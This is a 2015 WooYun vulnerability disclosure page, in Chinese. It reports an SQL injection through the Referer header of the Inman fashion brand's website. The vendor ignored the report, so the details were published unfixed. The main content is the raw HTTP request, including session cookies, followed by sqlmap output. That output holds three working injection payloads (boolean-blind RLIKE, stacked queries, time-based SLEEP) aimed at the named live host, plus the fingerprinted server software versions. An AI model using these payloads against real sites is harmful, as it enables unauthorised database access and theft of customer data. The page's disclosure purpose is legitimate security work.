当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140034

漏洞标题:女神的新衣之茵曼官网SQL注入导致敏感信息泄露

相关厂商:茵曼旗舰店

漏洞作者: 胡阿尤

提交时间:2015-09-10 16:49

修复时间:2015-10-25 16:50

公开时间:2015-10-25 16:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

最近在看《女神的新衣》,女神们都好美啊,设计师也都很有才,看完觉得整个人都艺术了好多。不过,想到现在乌云的搜索功能得要有账号才能用了,可我还没有账号,怎么办呢?

详细说明:

GET /goods/get_share HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP:*
X-Requested-With: XMLHttpRequest
Referer: http://www.inman.com.cn:80/
Cookie: webshopsid=shl8q7ud05mng6nj7nmdstpt72; ETT[history]=%2C852180014%2C852180071%2C8521020201%2C8523030697%2C8520220104%2C8520130327%2C8421020175%2C8520940260%2C8520300114; Hm_lvt_0f2a19486025586858b316ef9861dc93=1440409967,1440410011,1440410035,1440410297; Hm_lpvt_0f2a19486025586858b316ef9861dc93=1440410297; HMACCOUNT=4970FC886A17DDD0; jiathis_uniqid=144040950555dae7a10de5a; jiathis_rdc=%7B%22http%3A//www.inman.com.cn/goods-852180046_c-164.html%22%3A1595530427%2C%22http%3A//www.inman.com.cn/goods-8520220741_c-288.html%22%3A%223%7C1440409671762%22%7D; webimagesid=i14hgar3a52ifv623ihjtn9qf4
Host: www.inman.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


没有对HTTP头进行严格过滤,Referer处存在注入。

Parameter: Referer (Referer)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://www.inman.com.cn:80/goods/get_share') RLIKE (SELECT (CASE WHEN (4868=4868) THEN 0x687474703a2f2f7777772e696e6d616e2e636f6d2e636e3a38302f676f6f64732f6765745f7368617265 ELSE 0x28 END)) AND ('HzxO'='HzxO
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: http://www.inman.com.cn:80/goods/get_share');(SELECT * FROM (SELECT(SLEEP(5)))JFvI)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://www.inman.com.cn:80/goods/get_share') AND (SELECT * FROM (SELECT(SLEEP(5)))kedy) AND ('pprz'='pprz
---
[05:04:42] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.29, PHP 5.3.29
back-end DBMS: MySQL 5


漏洞证明:

1.jpg


2.jpg


3.jpg


4.jpg

修复方案:

其实我也不懂,我是来向大牛们学习的。

版权声明:转载请注明来源 胡阿尤@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝